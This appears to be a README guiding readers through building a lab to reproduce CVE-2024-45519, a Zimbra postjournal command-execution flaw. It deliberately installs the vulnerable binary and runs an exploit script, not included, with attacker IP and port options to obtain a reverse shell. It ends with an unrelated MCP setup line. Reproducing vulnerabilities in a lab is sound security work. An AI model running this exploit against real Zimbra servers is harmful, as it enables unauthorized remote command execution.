
CVE-2024-45519 is a vulnerability in Zimbra Collaboration (ZCS) that allows unauthenticated users to execute commands through the postjournal service. This guide walks you through setting up a lab environment to reproduce the issue and execute the exploit.
Prepare the test environment
Make sure you're running Ubuntu 20.04.6 LTS (Focal Fossa) on your lab machine.
Example test environment: Ubuntu 20.04.6 LTS.
Download Zimbra
Run the following commands to download and extract the Zimbra Collaboration package:
bash
sudo su
wget https://files.zimbra.com/downloads/8.8.15_GA/zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz
tar -xvzf zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz
cd zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220
Configure hostname
Set the hostname to zimbra.labo:
bash
hostnamectl set-hostname zimbra.labo
Install Zimbra
Follow the installation guide here 👉 Zimbra Installation Guide.
Use Zimbra's package repository when prompted. Select Yes for that option.
Replace the vulnerable postjournal binary
Kill the running postjournal process and replace the binary with the vulnerable one:
bash
sudo pkill postjournal
dpkg-deb -x packages/zimbra-core_8.8.15.GA.4177.UBUNTU20.64_amd64.deb /tmp/zimbra-core
sudo cp /tmp/zimbra-core/opt/zimbra/libexec/postjournal /opt/zimbra/libexec/postjournal
Enable and restart Zimbra services
Log in as the zimbra user and enable the postjournal service:
bash
sudo su - zimbra
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
Once the lab is set up and running, you can use the exploit to take advantage of the vulnerability.
Prepare the exploit
Ensure the exploit script (which we assume you've already prepared) targets the correct IP address and port.
Run the exploit
Execute the exploit to target the vulnerable Zimbra instance. For example, using your script:
bash
python exploit.py <target> -lh <attacker-ip> -lp <attacker-port> -p <smtp-port>
Enjoy your shell
Once the exploit successfully connects, you'll have command execution on the Zimbra server! 🎉
This exploit and guide are for educational purposes only. Use this information responsibly and only on systems you have explicit permission to test. Unauthorized exploitation of systems is illegal and unethical. The authors and contributors are not responsible for any misuse or damage caused by this information.
$ claude mcp add CVE-2024-45519 \
-- python -m otcore.mcp_server <graph>